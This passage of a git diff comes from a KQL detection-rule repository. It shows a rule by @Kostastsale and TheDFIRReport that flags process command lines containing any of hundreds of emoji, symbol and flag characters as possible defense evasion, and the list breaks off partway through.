"⏫" or ProcessCommandLine contains "⏬" or ProcessCommandLine contains "◀️" or ProcessCommandLine contains "🔼" or ProcessCommandLine contains "🔽" or ProcessCommandLine contains "➡️" or ProcessCommandLine contains "⬅️" or ProcessCommandLine contains "⬆️" or ProcessCommandLine contains "⬇️" or ProcessCommandLine contains "↗️" or ProcessCommandLine contains "↘️" or ProcessCommandLine contains "↙️" or ProcessCommandLine contains "↖️" or ProcessCommandLine contains "↕️" or ProcessCommandLine contains "↔️" or ProcessCommandLine contains "↪️" or ProcessCommandLine contains "↩️" or ProcessCommandLine contains "⤴️" or ProcessCommandLine contains "⤵️" or ProcessCommandLine contains "🔀" or ProcessCommandLine contains "🔁" or ProcessCommandLine contains "🔂" or ProcessCommandLine contains "🔄" or ProcessCommandLine contains "🔃" or ProcessCommandLine contains "🎵" or ProcessCommandLine contains "🎶" or ProcessCommandLine contains "➕" or ProcessCommandLine contains "➖" or ProcessCommandLine contains "➗" or ProcessCommandLine contains "✖️" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "♾" or ProcessCommandLine contains "💲" or ProcessCommandLine contains "💱" or ProcessCommandLine contains "™️" or ProcessCommandLine contains "©️" or ProcessCommandLine contains "®️" or ProcessCommandLine contains "〰️" or ProcessCommandLine contains "➰" or ProcessCommandLine contains "➿" or ProcessCommandLine contains "🔚" or ProcessCommandLine contains "🔙" or ProcessCommandLine contains "🔛" or ProcessCommandLine contains "🔝" or ProcessCommandLine contains "🔜" or ProcessCommandLine contains "✔️" or ProcessCommandLine contains "☑️" or ProcessCommandLine contains "🔘" or ProcessCommandLine contains "🔴" or ProcessCommandLine contains "🟠" or ProcessCommandLine contains "🟡" or ProcessCommandLine contains "🟢" or ProcessCommandLine contains "🔵" or ProcessCommandLine contains "🟣" or ProcessCommandLine contains "⚫️" or ProcessCommandLine contains "⚪️" or ProcessCommandLine contains "🟤" or 
ProcessCommandLine contains "🔺" or ProcessCommandLine contains "🔻"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
index b8cabf92..135b12e1 100644
--- a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
+++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql
@@ -1,10 +1,10 @@
-// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
-// Author: @Kostastsale, TheDFIRReport
-// Date: 2022-12-05
-// Level: high
-// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "🔸" or ProcessCommandLine contains "🔹" or ProcessCommandLine contains "🔶" or ProcessCommandLine contains "🔷" or ProcessCommandLine contains "🔳" or ProcessCommandLine contains "🔲" or ProcessCommandLine contains "▪️" or ProcessCommandLine contains "▫️" or ProcessCommandLine contains "◾️" or ProcessCommandLine contains "◽️" or ProcessCommandLine contains "◼️" or ProcessCommandLine contains "◻️" or ProcessCommandLine contains "🟥" or ProcessCommandLine contains "🟧" or ProcessCommandLine contains "🟨" or ProcessCommandLine contains "🟩" or ProcessCommandLine contains "🟦" or ProcessCommandLine contains "🟪" or ProcessCommandLine contains "⬛️" or ProcessCommandLine contains "⬜️" or ProcessCommandLine contains "🟫" or ProcessCommandLine contains "🔈" or ProcessCommandLine contains "🔇" or ProcessCommandLine contains "🔉" or ProcessCommandLine contains "🔊" or ProcessCommandLine contains "🔔" or ProcessCommandLine contains "🔕" or ProcessCommandLine contains "📣" or ProcessCommandLine contains "📢" or ProcessCommandLine contains "👁‍🗨" or ProcessCommandLine contains "💬" or ProcessCommandLine contains "💭" or ProcessCommandLine contains "🗯" or ProcessCommandLine contains "♠️" or ProcessCommandLine 
contains "♣️" or ProcessCommandLine contains "♥️" or ProcessCommandLine contains "♦️" or ProcessCommandLine contains "🃏" or ProcessCommandLine contains "🎴" or ProcessCommandLine contains "🀄️" or ProcessCommandLine contains "🕐" or ProcessCommandLine contains "🕑" or ProcessCommandLine contains "🕒" or ProcessCommandLine contains "🕓" or ProcessCommandLine contains "🕔" or ProcessCommandLine contains "🕕" or ProcessCommandLine contains "🕖" or ProcessCommandLine contains "🕗" or ProcessCommandLine contains "🕘" or ProcessCommandLine contains "🕙" or ProcessCommandLine contains "🕚" or ProcessCommandLine contains "🕛" or ProcessCommandLine contains "🕜" or ProcessCommandLine contains "🕝" or ProcessCommandLine contains "🕞" or ProcessCommandLine contains "🕟" or ProcessCommandLine contains "🕠" or ProcessCommandLine contains "🕡" or ProcessCommandLine contains "🕢" or ProcessCommandLine contains "🕣" or ProcessCommandLine contains "🕤" or ProcessCommandLine contains "🕥" or ProcessCommandLine contains "🕦" or ProcessCommandLine contains "🕧✢" or ProcessCommandLine contains "✣" or ProcessCommandLine contains "✤" or ProcessCommandLine contains "✥" or ProcessCommandLine contains "✦" or ProcessCommandLine contains "✧" or ProcessCommandLine contains "★" or ProcessCommandLine contains "☆" or ProcessCommandLine contains "✯" or ProcessCommandLine contains "✡︎" or ProcessCommandLine contains "✩" or ProcessCommandLine contains "✪" or ProcessCommandLine contains "✫" or ProcessCommandLine contains "✬" or ProcessCommandLine contains "✭" or ProcessCommandLine contains "✮" or ProcessCommandLine contains "✶" or ProcessCommandLine contains "✷" or ProcessCommandLine contains "✵" or ProcessCommandLine contains "✸" or ProcessCommandLine contains "✹" or ProcessCommandLine contains "→" or ProcessCommandLine contains "⇒" or ProcessCommandLine contains "⟹" or ProcessCommandLine contains "⇨" or ProcessCommandLine contains "⇾" or ProcessCommandLine contains "➾" or ProcessCommandLine contains "⇢" or 
ProcessCommandLine contains "☛" or ProcessCommandLine contains "☞" or ProcessCommandLine contains "➔" or ProcessCommandLine contains "➜" or ProcessCommandLine contains "➙" or ProcessCommandLine contains "➛" or ProcessCommandLine contains "➝" or ProcessCommandLine contains "➞" or ProcessCommandLine contains "♠︎" or ProcessCommandLine contains "♣︎" or ProcessCommandLine contains "♥︎" or ProcessCommandLine contains "♦︎" or ProcessCommandLine contains "♤" or ProcessCommandLine contains "♧" or ProcessCommandLine contains "♡" or ProcessCommandLine contains "♢" or ProcessCommandLine contains "♚" or ProcessCommandLine contains "♛" or ProcessCommandLine contains "♜" or ProcessCommandLine contains "♝" or ProcessCommandLine contains "♞" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "♔" or ProcessCommandLine contains "♕" or ProcessCommandLine contains "♖" or ProcessCommandLine contains "♗" or ProcessCommandLine contains "♘" or ProcessCommandLine contains "♙" or ProcessCommandLine contains "⚀" or ProcessCommandLine contains "⚁" or ProcessCommandLine contains "⚂" or ProcessCommandLine contains "⚃" or ProcessCommandLine contains "⚄" or ProcessCommandLine contains "⚅" or ProcessCommandLine contains "🂠" or ProcessCommandLine contains "⚈" or ProcessCommandLine contains "⚉" or ProcessCommandLine contains "⚆" or ProcessCommandLine contains "⚇" or ProcessCommandLine contains "𓀀" or ProcessCommandLine contains "𓀁" or ProcessCommandLine contains "𓀂" or ProcessCommandLine contains "𓀃" or ProcessCommandLine contains "𓀄" or ProcessCommandLine contains "𓀅" or ProcessCommandLine contains "𓀆" or ProcessCommandLine contains "𓀇" or ProcessCommandLine contains "𓀈" or ProcessCommandLine contains "𓀉" or ProcessCommandLine contains "𓀊" or ProcessCommandLine contains "𓀋" or ProcessCommandLine contains "𓀌" or ProcessCommandLine contains "𓀍" or ProcessCommandLine contains "𓀎" or ProcessCommandLine contains "𓀏" or ProcessCommandLine contains "𓀐" or ProcessCommandLine contains "𓀑" or 
ProcessCommandLine contains "𓀒" or ProcessCommandLine contains "𓀓" or ProcessCommandLine contains "𓀔" or ProcessCommandLine contains "𓀕" or ProcessCommandLine contains "𓀖" or ProcessCommandLine contains "𓀗" or ProcessCommandLine contains "𓀘" or ProcessCommandLine contains "𓀙" or ProcessCommandLine contains "𓀚" or ProcessCommandLine contains "𓀛" or ProcessCommandLine contains "𓀜" or ProcessCommandLine contains "𓀝🏳️" or ProcessCommandLine contains "🏴" or ProcessCommandLine contains "🏁" or ProcessCommandLine contains "🚩" or ProcessCommandLine contains "🏳️‍🌈" or ProcessCommandLine contains "🏳️‍⚧️" or ProcessCommandLine contains "🏴‍☠️" or ProcessCommandLine contains "🇦🇫" or ProcessCommandLine contains "🇦🇽" or ProcessCommandLine contains "🇦🇱" or ProcessCommandLine contains "🇩🇿" or ProcessCommandLine contains "🇦🇸" or ProcessCommandLine contains "🇦🇩" or ProcessCommandLine contains "🇦🇴" or ProcessCommandLine contains "🇦🇮" or ProcessCommandLine contains "🇦🇶" or ProcessCommandLine contains "🇦🇬" or ProcessCommandLine contains "🇦🇷" or ProcessCommandLine contains "🇦🇲" or ProcessCommandLine contains "🇦🇼" or ProcessCommandLine contains "🇦🇺" or ProcessCommandLine contains "🇦🇹" or ProcessCommandLine contains "🇦🇿" or ProcessCommandLine contains "🇧🇸" or ProcessCommandLine contains "🇧🇭" or ProcessCommandLine contains "🇧🇩" or ProcessCommandLine contains "🇧🇧" or ProcessCommandLine contains "🇧🇾" or ProcessCommandLine contains "🇧🇪" or ProcessCommandLine contains "🇧🇿" or ProcessCommandLine contains "🇧🇯" or ProcessCommandLine contains "🇧🇲" or ProcessCommandLine contains "🇧🇹" or ProcessCommandLine contains "🇧🇴" or ProcessCommandLine contains "🇧🇦" or ProcessCommandLine contains "🇧🇼" or ProcessCommandLine contains "🇧🇷" or ProcessCommandLine contains "🇮🇴" or ProcessCommandLine contains "🇻🇬" or ProcessCommandLine contains "🇧🇳" or ProcessCommandLine contains "🇧🇬" or ProcessCommandLine contains "🇧🇫" or ProcessCommandLine contains "🇧🇮" or ProcessCommandLine contains "🇰🇭" or ProcessCommandLine 
contains "🇨🇲" or ProcessCommandLine contains "🇨🇦" or ProcessCommandLine contains "🇮🇨" or ProcessCommandLine contains "🇨🇻" or ProcessCommandLine contains "🇧🇶" or ProcessCommandLine contains "🇰🇾" or ProcessCommandLine contains "🇨🇫" or ProcessCommandLine contains "🇹🇩" or ProcessCommandLine contains "🇨🇱" or ProcessCommandLine contains "🇨🇳" or ProcessCommandLine contains "🇨🇽" or ProcessCommandLine contains "🇨🇨" or ProcessCommandLine contains "🇨🇴" or ProcessCommandLine contains "🇰🇲" or ProcessCommandLine contains "🇨🇬" or ProcessCommandLine contains "🇨🇩" or ProcessCommandLine contains "🇨🇰" or ProcessCommandLine contains "🇨🇷" or ProcessCommandLine contains "🇨🇮" or ProcessCommandLine contains "🇭🇷" or ProcessCommandLine contains "🇨🇺" or ProcessCommandLine contains "🇨🇼" or ProcessCommandLine contains "🇨🇾" or ProcessCommandLine contains "🇨🇿" or ProcessCommandLine contains "🇩🇰" or ProcessCommandLine contains "🇩🇯" or ProcessCommandLine contains "🇩🇲" or ProcessCommandLine contains "🇩🇴" or ProcessCommandLine contains "🇪🇨" or ProcessCommandLine contains "🇪🇬" or ProcessCommandLine contains "🇸🇻" or ProcessCommandLine contains "🇬🇶" or ProcessCommandLine contains "🇪🇷" or ProcessCommandLine contains "🇪🇪" or ProcessCommandLine contains "🇪🇹" or ProcessCommandLine contains "🇪🇺" or ProcessCommandLine contains "🇫🇰" or ProcessCommandLine contains "🇫🇴" or ProcessCommandLine contains "🇫🇯" or ProcessCommandLine contains "🇫🇮" or ProcessCommandLine contains "🇫🇷" or ProcessCommandLine contains "🇬🇫" or ProcessCommandLine contains "🇵🇫" or ProcessCommandLine contains "🇹🇫" or ProcessCommandLine contains "🇬🇦" or ProcessCommandLine contains "🇬🇲" or ProcessCommandLine contains "🇬🇪" or ProcessCommandLine contains "🇩🇪" or ProcessCommandLine contains "🇬🇭" or ProcessCommandLine contains "🇬🇮" or ProcessCommandLine contains "🇬🇷" or ProcessCommandLine contains "🇬🇱" or ProcessCommandLine contains "🇬🇩" or ProcessCommandLine contains "🇬🇵" or ProcessCommandLine contains "🇬🇺" or ProcessCommandLine contains "🇬🇹" or 
ProcessCommandLine contains "🇬🇬" or ProcessCommandLine contains "🇬🇳" or ProcessCommandLine contains "🇬🇼" or ProcessCommandLine contains "🇬🇾" or ProcessCommandLine contains "🇭🇹" or ProcessCommandLine contains "🇭🇳" or ProcessCommandLine contains "🇭🇰" or ProcessCommandLine contains "🇭🇺" or ProcessCommandLine contains "🇮🇸" or ProcessCommandLine contains "🇮🇳" or ProcessCommandLine contains "🇮🇩" or ProcessCommandLine contains "🇮🇷" or ProcessCommandLine contains "🇮🇶" or ProcessCommandLine contains "🇮🇪" or ProcessCommandLine contains "🇮🇲" or ProcessCommandLine contains "🇮🇱" or ProcessCommandLine contains "🇮🇹" or ProcessCommandLine contains "🇯🇲" or ProcessCommandLine contains "🇯🇵" or ProcessCommandLine contains "🎌" or ProcessCommandLine contains "🇯🇪" or ProcessCommandLine contains "🇯🇴" or ProcessCommandLine contains "🇰🇿" or ProcessCommandLine contains "🇰🇪" or ProcessCommandLine contains "🇰🇮" or ProcessCommandLine contains "🇽🇰" or ProcessCommandLine contains "🇰🇼" or ProcessCommandLine contains "🇰🇬" or ProcessCommandLine contains "🇱🇦" or ProcessCommandLine contains "🇱🇻" or ProcessCommandLine contains "🇱🇧" or ProcessCommandLine contains "🇱🇸" or ProcessCommandLine contains "🇱🇷" or ProcessCommandLine contains "🇱🇾" or ProcessCommandLine contains "🇱🇮" or ProcessCommandLine contains "🇱🇹" or ProcessCommandLine contains "🇱🇺" or ProcessCommandLine contains "🇲🇴" or ProcessCommandLine contains "🇲🇰" or ProcessCommandLine contains "🇲🇬" or ProcessCommandLine contains "🇲🇼" or ProcessCommandLine contains "🇲🇾" or ProcessCommandLine contains "🇲🇻" or ProcessCommandLine contains "🇲🇱" or ProcessCommandLine contains "🇲🇹" or ProcessCommandLine contains "🇲🇭" or ProcessCommandLine contains "🇲🇶" or ProcessCommandLine contains "🇲🇷" or ProcessCommandLine contains "🇲🇺" or ProcessCommandLine contains "🇾🇹" or ProcessCommandLine contains "🇲🇽" or ProcessCommandLine contains "🇫🇲" or ProcessCommandLine contains "🇲🇩" or ProcessCommandLine contains "🇲🇨" or ProcessCommandLine contains "🇲🇳" or ProcessCommandLine 
contains "🇲🇪" or ProcessCommandLine contains "🇲🇸" or ProcessCommandLine contains "🇲🇦" or ProcessCommandLine contains "🇲🇿" or ProcessCommandLine contains "🇲🇲" or ProcessCommandLine contains "🇳🇦" or ProcessCommandLine contains "🇳🇷" or ProcessCommandLine contains "🇳🇵" or ProcessCommandLine contains "🇳🇱" or ProcessCommandLine contains "🇳🇨" or ProcessCommandLine contains "🇳🇿" or ProcessCommandLine contains "🇳🇮" or ProcessCommandLine contains "🇳🇪" or ProcessCommandLine contains "🇳🇬" or ProcessCommandLine contains "🇳🇺" or ProcessCommandLine contains "🇳🇫" or ProcessCommandLine contains "🇰🇵" or ProcessCommandLine contains "🇲🇵" or ProcessCommandLine contains "🇳🇴" or ProcessCommandLine contains "🇴🇲" or ProcessCommandLine contains "🇵🇰" or ProcessCommandLine contains "🇵🇼" or ProcessCommandLine contains "🇵🇸" or ProcessCommandLine contains "🇵🇦" or ProcessCommandLine contains "🇵🇬" or ProcessCommandLine contains "🇵🇾" or ProcessCommandLine contains "🇵🇪" or ProcessCommandLine contains "🇵🇭" or ProcessCommandLine contains "🇵🇳" or ProcessCommandLine contains "🇵🇱" or ProcessCommandLine contains "🇵🇹" or ProcessCommandLine contains "🇵🇷" or ProcessCommandLine contains "🇶🇦" or ProcessCommandLine contains "🇷🇪" or ProcessCommandLine contains "🇷🇴" or ProcessCommandLine contains "🇷🇺" or ProcessCommandLine contains "🇷🇼" or ProcessCommandLine contains "🇼🇸" or ProcessCommandLine contains "🇸🇲" or ProcessCommandLine contains "🇸🇦" or ProcessCommandLine contains "🇸🇳" or ProcessCommandLine contains "🇷🇸" or ProcessCommandLine contains "🇸🇨" or ProcessCommandLine contains "🇸🇱" or ProcessCommandLine contains "🇸🇬" or ProcessCommandLine contains "🇸🇽" or ProcessCommandLine contains "🇸🇰" or ProcessCommandLine contains "🇸🇮" or ProcessCommandLine contains "🇬🇸" or ProcessCommandLine contains "🇸🇧" or ProcessCommandLine contains "🇸🇴" or ProcessCommandLine contains "🇿🇦" or ProcessCommandLine contains "🇰🇷" or ProcessCommandLine contains "🇸🇸" or ProcessCommandLine contains "🇪🇸" or ProcessCommandLine contains "🇱🇰" or 
ProcessCommandLine contains "🇧🇱" or ProcessCommandLine contains "🇸🇭" or ProcessCommandLine contains "🇰🇳" or ProcessCommandLine contains "🇱🇨" or ProcessCommandLine contains "🇵🇲" or ProcessCommandLine contains "🇻🇨" or ProcessCommandLine contains "🇸🇩" or ProcessCommandLine contains "🇸🇷" or ProcessCommandLine contains "🇸🇿" or ProcessCommandLine contains "🇸🇪" or ProcessCommandLine contains "🇨🇭" or ProcessCommandLine contains "🇸🇾" or ProcessCommandLine contains "🇹🇼" or ProcessCommandLine contains "🇹🇯" or ProcessCommandLine contains "🇹🇿" or ProcessCommandLine contains "🇹🇭" or ProcessCommandLine contains "🇹🇱" or ProcessCommandLine contains "🇹🇬" or ProcessCommandLine contains "🇹🇰" or ProcessCommandLine contains "🇹🇴" or ProcessCommandLine contains "🇹🇹" or ProcessCommandLine contains "🇹🇳" or ProcessCommandLine contains "🇹🇷" or ProcessCommandLine contains "🇹🇲" or ProcessCommandLine contains "🇹🇨" or ProcessCommandLine contains "🇹🇻" or ProcessCommandLine contains "🇻🇮" or ProcessCommandLine contains "🇺🇬" or ProcessCommandLine contains "🇺🇦" or ProcessCommandLine contains "🇦🇪" or ProcessCommandLine contains "🇬🇧" or ProcessCommandLine contains "🏴󠁧󠁢󠁥󠁮󠁧󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁳󠁣󠁴󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁷󠁬󠁳󠁿" or ProcessCommandLine contains "🇺🇳" or ProcessCommandLine contains "🇺🇸" or ProcessCommandLine contains "🇺🇾" or ProcessCommandLine contains "🇺🇿" or ProcessCommandLine contains "🇻🇺" or ProcessCommandLine contains "🇻🇦" or ProcessCommandLine contains "🇻🇪" or ProcessCommandLine contains "🇻🇳" or ProcessCommandLine contains "🇼🇫" or ProcessCommandLine contains "🇪🇭" or ProcessCommandLine contains "🇾🇪" or ProcessCommandLine contains "🇿🇲" or ProcessCommandLine contains "🇿🇼🫠" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🫤" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫱🏻" or 
ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🤝🏻" or ProcessCommandLine contains "🤝🏼" or ProcessCommandLine contains "🤝🏽" or ProcessCommandLine contains "🤝🏾" or ProcessCommandLine contains "🤝🏿" or ProcessCommandLine contains "🫱🏻‍🫲🏼" or ProcessCommandLine contains "🫱🏻‍🫲🏽" or ProcessCommandLine contains "🫱🏻‍🫲🏾" or ProcessCommandLine contains "🫱🏻‍🫲🏿" or ProcessCommandLine contains "🫱🏼‍🫲🏻" or ProcessCommandLine contains "🫱🏼‍🫲🏽" or ProcessCommandLine contains "🫱🏼‍🫲🏾" or ProcessCommandLine contains "🫱🏼‍🫲🏿" or ProcessCommandLine contains "🫱🏽‍🫲🏻" or ProcessCommandLine contains 
"🫱🏽‍🫲🏼" or ProcessCommandLine contains "🫱🏽‍🫲🏾" or ProcessCommandLine contains "🫱🏽‍🫲🏿" or ProcessCommandLine contains "🫱🏾‍🫲🏻" or ProcessCommandLine contains "🫱🏾‍🫲🏼" or ProcessCommandLine contains "🫱🏾‍🫲🏽" or ProcessCommandLine contains "🫱🏾‍🫲🏿" or ProcessCommandLine contains "🫱🏿‍🫲🏻" or ProcessCommandLine contains "🫱🏿‍🫲🏼" or ProcessCommandLine contains "🫱🏿‍🫲🏽" or ProcessCommandLine contains "🫱🏿‍🫲🏾" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains 
"🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "💑🏻" or ProcessCommandLine contains "💑🏼" or ProcessCommandLine contains "💑🏽" or ProcessCommandLine contains "💑🏾" or ProcessCommandLine contains "💑🏿" or ProcessCommandLine contains "💏🏻" or ProcessCommandLine contains "💏🏼" or ProcessCommandLine contains "💏🏽" or ProcessCommandLine contains "💏🏾" or ProcessCommandLine contains "💏🏿" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏾" or ProcessCommandLine 
contains "👩🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏾‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏿‍❤️‍👩🏿" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏼" or ProcessCommandLine contains "🧑🏻‍❤️‍🧑🏽" or 
